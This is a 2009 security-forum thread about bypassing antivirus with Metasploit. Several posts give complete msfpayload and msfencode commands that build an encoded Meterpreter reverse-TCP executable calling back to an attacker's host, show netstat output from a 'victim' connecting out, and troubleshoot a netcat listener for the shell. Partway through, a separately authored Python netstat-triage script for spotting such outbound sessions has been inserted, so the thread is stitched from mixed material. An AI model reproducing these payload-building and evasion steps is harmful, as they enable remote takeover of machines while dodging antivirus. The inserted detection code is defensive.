Power of Metasploit!
Bypassing Antivirus with Metasploit
#2
Posted 20 January 2009 - 08:18 AM
I've been pretty happy overall with the new 3.2 framework. Thanks for posting the video
--P>G>>
The gopher is back!
#3
Posted 20 January 2009 - 10:01 AM
Moreover, Metasploit is moving into a lot of diversity, like Didier Stevens building them a module for PDF exploits etc.
#4
Posted 21 January 2009 - 12:33 AM
$ ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=8080 R | ./msfencode -b '' -t exe -o meterpreter.exe
[-] Invalid format: exe
:-(
-berz3k.
#5
Posted 21 January 2009 - 05:19 PM
Do an SVN update and check once more.
#6
Posted 22 January 2009 - 07:41 PM
$ ./msfpayload windows/meterpreter/reverse_tcp LHOST=172.20.40.32 LPORT=8080 R | ./msfencode -b '' -t exe -o meterpreter.exe
***********************************************************************
*** *
*** This version of the Ruby interpreter has significant problems, we *
*** strongly recommend that you switch to version 1.8.6 until these *
*** issues have been corrected. Alternatively, you can download, *
*** build, and install the latest Ruby snapshot from: *
*** - http://www.ruby-lang.org/ *
*** For more information, please see the following URL: *
*** - https://bugs.launchpad.net/bugs/282302 *
*** *
***********************************************************************
[*] x86/shikata_ga_nai succeeded, final size 76
intrusa@x ~/MSF/trunk $ chmod 777 meterpreter.exe
----------------------------------
Works fine over Unix port MACOSX x86
----------------------------------
Creating the .exe file
sh-3.2# ./msfpayload windows/meterpreter/reverse_tcp LHOST=172.20.40.32 LPORT=8080 R | ./msfencode -b '' -t exe -o meterpreter.exe
[*] x86/shikata_ga_nai succeeded, final size 306
meterpreter.exe executed (Victim)
C:\>netstat -an

Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:25             0.0.0.0:0              LISTENING
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:1025           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:1026           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:1027           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:1032           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:1040           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:1910           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:3372           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:4899           0.0.0.0:0              LISTENING
  TCP    127.0.0.1:1903         127.0.0.1:1902         TIME_WAIT
  TCP    172.18.0.27:139        0.0.0.0:0              LISTENING
  TCP    172.18.0.27:1910       172.20.40.32:8080      ESTABLISHED   <---- kool
  UDP    0.0.0.0:135            *:*
  UDP    0.0.0.0:401            *:*
  UDP    0.0.0.0:402            *:*
  UDP    0.0.0.0:445            *:*
  UDP    0.0.0.0:1028           *:*
  UDP    0.0.0.0:1030           *:*
  UDP    0.0.0.0:3456           *:*
  UDP    172.18.0.27:137        *:*
  UDP    172.18.0.27:138        *:*
Listen port (intruder)
C:\>nc -lp 8080
c:\>             <---- Broken mmmm
Doesn't work! :-( Does anyone know why?
-berz3k.
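Taking the netstat output quoted in the post above as sample data, here is an added example (not code from this thread or from the Metasploit project) of the triage check a host analyst would run to spot an unexpected established outbound connection like the one marked "kool": parse `netstat -an`, keep only established TCP sessions the host itself initiated, and flag those whose remote side is outside the local subnet or on a port the host is not expected to talk to. The local subnet (172.18.0.0/16), the expected-port list, and the trimmed sample (a subset of the rows in the post) are all assumptions made for this example.

```python
import re
from ipaddress import ip_address, ip_network

# Constructed sample: a subset of the rows from the netstat -an output
# quoted in the thread. Not a live capture.
SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:25             0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    127.0.0.1:1903         127.0.0.1:1902         TIME_WAIT
  TCP    172.18.0.27:139        0.0.0.0:0              LISTENING
  TCP    172.18.0.27:1910       172.20.40.32:8080      ESTABLISHED
  UDP    0.0.0.0:135            *:*
  UDP    172.18.0.27:137        *:*
"""

# One netstat row: proto, local addr:port, foreign addr:port, optional state.
LINE_RE = re.compile(
    r"^\s*(TCP|UDP)\s+(\S+):(\d+|\*)\s+(\S+):(\d+|\*)\s*(\S+)?\s*$"
)

# Remote ports this host is expected to reach outbound (assumption for the demo).
EXPECTED_REMOTE_PORTS = {25, 53, 80, 139, 443, 445}


def parse_netstat(text):
    """Parse Windows 'netstat -an' text into a list of row dicts."""
    rows = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # header, blank line, or something we do not understand
        proto, laddr, lport, faddr, fport, state = m.groups()
        rows.append({
            "proto": proto, "laddr": laddr, "lport": lport,
            "faddr": faddr, "fport": fport, "state": state or "",
        })
    return rows


def find_suspicious(rows, local_nets=("172.18.0.0/16",),
                    expected_ports=EXPECTED_REMOTE_PORTS):
    """Return (laddr, lport, faddr, fport) for established TCP sessions that
    this host initiated (ephemeral local port) and whose peer is either off
    the local subnet or on a port not in the expected list."""
    nets = [ip_network(n) for n in local_nets]
    hits = []
    for r in rows:
        if r["proto"] != "TCP" or r["state"] != "ESTABLISHED":
            continue
        peer = ip_address(r["faddr"].strip("[]"))  # tolerate [::1]-style addrs
        if peer.is_loopback:
            continue  # local IPC, not an outbound session
        fport = int(r["fport"])
        off_subnet = not any(peer in n for n in nets)
        client_side = int(r["lport"]) >= 1024  # ephemeral port: we connected out
        if client_side and (off_subnet or fport not in expected_ports):
            hits.append((r["laddr"], r["lport"], r["faddr"], fport))
    return hits


if __name__ == "__main__":
    for hit in find_suspicious(parse_netstat(SAMPLE_NETSTAT)):
        print("unexpected outbound session: %s:%s -> %s:%d" % hit)
```

On the sample this reports the single session to 172.20.40.32:8080; the loopback TIME_WAIT pair and all LISTENING sockets are ignored. Listening sockets on a high port that never show an ESTABLISHED peer are not evidence of anything by themselves, which is why the check keys on the established session rather than on the open port.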
#7
Posted 23 January 2009 - 02:37 AM
Doesn't work! (Win32 Vista)
***********************************************************************
*** *
*** This version of the Ruby interpreter has significant problems, we *
*** strongly recommend that you switch to version 1.8.6 until these *
*** issues have been corrected. Alternatively, you can download, *
*** build, and install the latest Ruby snapshot from: *
*** - http://www.ruby-lang.org/ *
*** For more information, please see the following URL: *
*** - https://bugs.launchpad.net/bugs/282302 *
*** *
***********************************************************************
The explanation is right in the error message. msf needs Ruby 1.8.6. You probably downloaded the latest Ruby Windows install from the Ruby site, which is 1.8.7. You need to remove this Ruby version and install 1.8.6.
#8
Posted 23 January 2009 - 03:18 AM
I am not sure what you are trying?
You build the exe on the Linux host with IP 172.20.40.32 and test on a Vista host with IP 172.18.0.27. You build a reverse TCP connect shell and check for the reverse shell on the Windows host??
@DidierStevens
If my memory serves me right, I have 1.8.6 and I still get the error. To confirm I will post my versions later on.
#9
Posted 23 January 2009 - 03:55 AM
@DidierStevens
If my memory serves me right, I have 1.8.6 and I still get the error. To confirm I will post my versions later on.
I used msf with Ruby 1.8.7 on a Windows XP box and it didn't work; I had to downgrade to 1.8.6. That was about a month ago.
#10
Posted 24 January 2009 - 10:11 AM
#11
Posted 24 January 2009 - 11:51 AM
nice VD and good job
#12
Posted 27 January 2009 - 11:40 AM
Thanks for the info, dude! Now I am changing the Ruby version.
@Webdevil
1) The meterpreter.exe built over MACOSX/x86 (port) with reverse_tcp, address 172.20.40.32 and port 8080 works fine.
2) Then I put the meterpreter.exe on the victim (172.18.0.27, win2k server) and I saw the TCP 8080 connection; you can see the intruder address (172.20.40.32:8080). Works fine using netstat.
BUT!!!
3) On the intruder machine (172.20.40.32), I'm listening on port 8080 with nc -lp 8080 and the connection is broken :-(
-berz3k.
#13
Posted 18 February 2012 - 11:29 AM
http://www.pentestge...st-writing-asm/
Hope this helps!